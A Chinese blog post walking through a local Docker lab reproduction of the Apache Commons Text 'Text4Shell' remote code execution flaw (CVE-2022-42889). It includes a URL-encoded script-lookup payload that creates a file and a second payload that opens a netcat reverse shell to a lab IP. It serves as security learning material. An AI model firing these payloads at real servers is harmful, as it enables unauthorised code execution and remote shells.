CVE-2022-42889 Text4shell

已于 2024-01-25 15:32:46 修改
阅读量996 收藏 25
点赞数 16
分类专栏: 漏洞 文章标签: web安全
于 2024-01-25 15:29:08 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/sinat_42420072/article/details/135845550
版权

前言

Text4shell 漏洞于 2022 年 10 月 13 日向 Apache 披露。Text4Shell 是一个影响使用 Apache Commons Text Library 某些功能的 Java 产品的漏洞,它可能允许远程攻击者在服务器上执行任意代码

一、漏洞复现

1、环境搭建

漏洞利用前提条件:
1)JDK版本11.0以上;
2)Docker;
3)Maven
安装JDK,命令:sudo apt install openjdk-11-jdk
在这里插入图片描述安装docker
在这里插入图片描述

新建文件夹 maven,安装maven
命令:wget https://mirrors.estointernet.in/apache/maven/maven-3/3.6.3/binaries/apache-maven-3.6.3-bin.tar.gz
在这里插入图片描述

从 github 拉取PoC,命令:git clone https://github.com/karthikuj/cve-2022-42889-text4shell-docker.git
在这里插入图片描述

进入PoC文件夹后使用mvn clean install(请注意如果嫌麻烦可以设置环境变量)
注:我的 maven 安装路径在家目录下
命令:…/…/maven/apache-maven-3.6.3/bin/mvn clean install
当返回BUILD SUCCESS时, 代表可以进行下一步
在这里插入图片描述

docker拉取镜像,命令:sudo docker build --tag=text4shell .
ps:注意后面是有一个点
在这里插入图片描述

启动docker测试,命令:sudo docker run -p 80:8080 text4shell
在这里插入图片描述

访问 http://localhost/test4shell/attack?search=ubontu
结果报错,提示类型不对
在这里插入图片描述

抓包修改一下,如下图就是启动成功了
在这里插入图片描述

2、漏洞检测

构造payload:${script:javascript:java.lang.Runtime.getRuntime().exec(‘touch /tmp/foo’)}
编码后,即访问
/text4shell/attack?search=%24%7Bscript%3Ajavascript%3Ajava.lang.Runtime.getRuntime%28%29.exec%28%27touch%20%2Ftmp%2Ffoo%27%29%7D
结果如下图所示
在这里插入图片描述

在虚拟机 docker 中验证结果
获取容器ID,命令:sudo docker container ls
在这里插入图片描述

进入容器查看我们刚刚新建的文件foo,命令:sudo docker exec -it <CONTAINER_ID> bash,也就是 sudo docker exec -it 488649bfe65f bash
在这里插入图片描述

也可以利用该漏洞反弹shell
构造poc:/text4shell/attack?search=%24%7Bscript%3Ajavascript%3Ajava.lang.Runtime.getRuntime%28%29.exec%28%27nc%20192.168.184.14%205555%20-e%20%2Fbin%2Fbash%27%29%7D
在这里插入图片描述

但是不知道为什么反弹失败,蹲一个大佬教教我

Mmy_yao
关注
  • 16
    点赞
  • 25
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Apache Commons Text 任意代码执行漏洞复现(CVE-2022-42889)
LainWith的博客
10-21 3756
Apache Commons Text 是一个专注于处理字符串的算法的库。该组件中存在任意代码执行漏洞,若攻击者对StringSubstitutor处理的字符串可控,则可通过该漏洞在受害者机器上执行任意代码。
[漏洞复现]Text4shellCVE-2022-42889)
qq_45751902的博客
11-28 3289
Apache Commons Text 项目实现了一系列关于文本字符串的算法,专注于处理字符串和文本块。10月13日,Apache发布安全公告,修复了Apache Commons Text中的一个远程代码执行漏洞(CVE-2022-42889)。 Apache Commons Text版本1.5到1.9中,该问题的根源在于在DNS、脚本和 URL 查找期间执行的字符串替换方式可能导致在传递不受信任的输入时在易受攻击的系统上执行任意代码。 成功利用该漏洞可以使威胁参与者仅通过特制的有效负载打开与易受攻击的应用
『Java CVE』CVE-2022-42889: Apache Commons Text RCE(Text4Shell)
Ho1aAs‘s Blog
10-24 2171
# 影响版本 Apache Commons Text ≤ 1.9 # 漏洞原理 插值器允许执行script 原理跟CVE-2022-33980: Apache Commons Configuration读文件RCE一样
CVE-2022-42889 Apache Commons Text 漏洞
王嘟嘟的博客
02-28 965
所幸遇到,就简单看看,其中没有啥比较难的地方,仅做记录。10月13日的漏洞。
LINUX漏洞复现篇之ShellShock漏洞
xf555er的博客
12-06 1020
ShellShock漏洞, 中文称为"破壳漏洞", 是Unix Shell中的安全漏洞在一些网络服务器的部署中, 使用bash来处理某些请求, 允许攻击者通过低版本的bash执行任意Shell命令此漏洞在调用BashShell之前使用payload创建环境变量, 这些环境变量包含Shell代码, 在Shell被调用后代码会被执行bash使用的环境变量是通过函数名称来调用的,以""开头通过环境变量来定义,而在处理这样的恶意的函数环境变量时,并没有以函数结尾 “” 为结束,而是执行其后的恶意shell命令Vul
阿里云国际站代理商:阿里云推出的专有云和私有云之间的区别?
聚搜云_上海聚搜信息技术有限公司
07-10 585
在当今全球云计算市场的大潮中,阿里云以其坚实的技术实力和卓越的服务品质,屹然坐稳世界前沿的位置,无人能够撼动其领先地位。综上所述,云计算大家庭中的两位重要成员——阿里云的专有云和私有云,虽同属一家,其在使用场景、适用用户以及开发成本等多个方面却各有千秋,各有鲜明特色。专有云凭借其超高的灵活度和扩展性,更为适配大型企业的使用需求,尤其对于对数据安全有着严格要求的企业,采用专有云将会是一项极具眼光的选择。其次,在各自的应用场景和目标人群上,专有云和私有云也有明显的差异。首先,我们从最基本的定义纵观二者。
CVE-2022-33891POC Apache Spark 命令注入(CVE-2022-33891)POC
08-10
CVE-2022-33891POC Apache Spark 命令注入(CVE-2022-33891)POC CVE-2022-33891 影响版本 Apache spark version 3.1.1版本 Apache Spark version>= 3.3.0 修复方案 1.建议升级到安全版本,参考官网链接: ...
CVE-2022-22963 复现Demo
04-14
CVE-2022-22963 复现Demo,A Spring MVC or Spring WebFlux application running on JDK 9+ may be vulnerable to remote code execution (RCE) via data binding. The specific exploit requires the application ...
XStream拒绝服务漏洞(CVE-2022-41966)响应通告
05-05
XStream拒绝服务漏洞(CVE-2022-41966)响应通告
CVE-2022-22965 GUItools单个图形化利用工具
04-06
CVE-2010-1622中曾出现由于参数自动绑定机制导致的问题, 此前通过黑名单的方式修复了该漏洞,但是 JDK9之后引入了 Module,使得可以通过 getModule 绕过前者的黑名单限制,最后导致远程代码执行。
Sublime Text 4(Build 4126)下载注册 及 修改运行配置为终端运行(C/C++、Java、Python)
qq_40430360的博客
07-08 6220
Sublime Text 4(Build 4126)下载注册 及 修改运行配置为终端运行(C/C++、Java、Python)
Apache Commons Text Library Flaw,CVE-2022-42889
m0_60568198的博客
10-30 303
CVE-2022-42889漏洞
公有云、私有云、专属云以及混合云
五仁月饼哭了的博客
01-19 4518
随着云计算的逐渐兴起,云计算最基础的产品云主机非常受欢迎,其中云主机分为公有云、私有云和公有云,许多企业准备把数据往云上迁移,不知道选择那类云主机,接下来稳网互联小编来谈谈什么是公有云、什么是私有云,希望对你有帮助。 公有云 公有云,是由云服务提供商控制,用于云服务用户和资源的云部署模式。云服务商构建基础架构,整合资源构建云端虚拟资源池,根据需要分配给多租户使用。我们经常听到或...
谈谈对专有云和专属云的认识
Mr_ding1的博客
01-05 2211
专有云随着市场需求的变化应运而出,对此各种云服务商都提出了自己的专有云解决方案,大体可以分为两类:自建模式和专用模式。
一文了解公有云、私有云、混合云、边缘云、专有云、分布式云
weixin_46575696的博客
07-19 1698
一文了解公有云、私有云、混合云、边缘云、专有云、分布式云
【网络安全的神秘世界】SQL注入(下)
最新发布
weixin_54750312的博客
07-04 1428
通过前面的SQL注入实验可以发现,字符型的注入点我们都是用单引号来判断的,但是当遇到 addslashes() 函数时,单引号会被转义,导致我们用来判断注入点的单引号失效。在将数据存入到了数据库中之后,开发者就认为数据是可信的。通过前面的学习可以了解到,SQL注入非常关键的一步就是让引号闭合和跳出引号,无法跳出引号,那么输入的内容就永远在引号里,即永远是字符串,无法实现SOL注入。出现了语法错误,意味着输入的内容会到数据库中进行查询,接下来的步骤就很简单了,跟前面的报错注入是一样的。
网络安全&密码学—python中的各种加密算法
xt350488的博客
07-02 1081
数据加密是一种保护数据安全的技术,通过将数据(明文)转换为不易被未经授权的人理解的形式(密文),以防止数据泄露、篡改或滥用。加密后的数据(密文)可以通过解密过程恢复成原始数据(明文)。数据加密的核心是密码学,它是研究密码系统或通信安全的一门学科,包括密码编码学和密码分析学。在网络安全和密码学领域,数据加密是保护数据机密性、完整性和可用性的关键技术。Python作为一种功能强大的编程语言,提供了多种实现数据加密和解密的方法。
网络安全(黑客)自学
白帽子凯哥聊黑客
07-02 956
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域,都有攻与防两面性,例如 Web 安全技术,既有 Web 渗透,也有 Web 防御技术(WAF)。作为一个合格的网络安全工程师,应该做到攻守兼备,毕竟知己知彼,才能百战百胜。
CVE-2022-41741, CVE-2022-41742
08-02
CVE-2022-41741和CVE-2022-41742是影响NGINX Plus、NGINX开源版以及NGINX企阅版的漏洞。CVE-2022-41741是一个内存损坏漏洞,CVSS评分为7.1(高危),而CVE-2022-41742是一个内存泄漏漏洞,CVSS评分为7.0(高危)。[1]为了修复这些漏洞,NGINX发布了稳定版nginx-1.22.1和主线版nginx-1.23.2,并包含了针对ngx_http_mp4_module中内存损坏和内存泄漏的修复补丁。[3]这些修复补丁可以帮助防止攻击者利用这些漏洞对系统造成损害。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值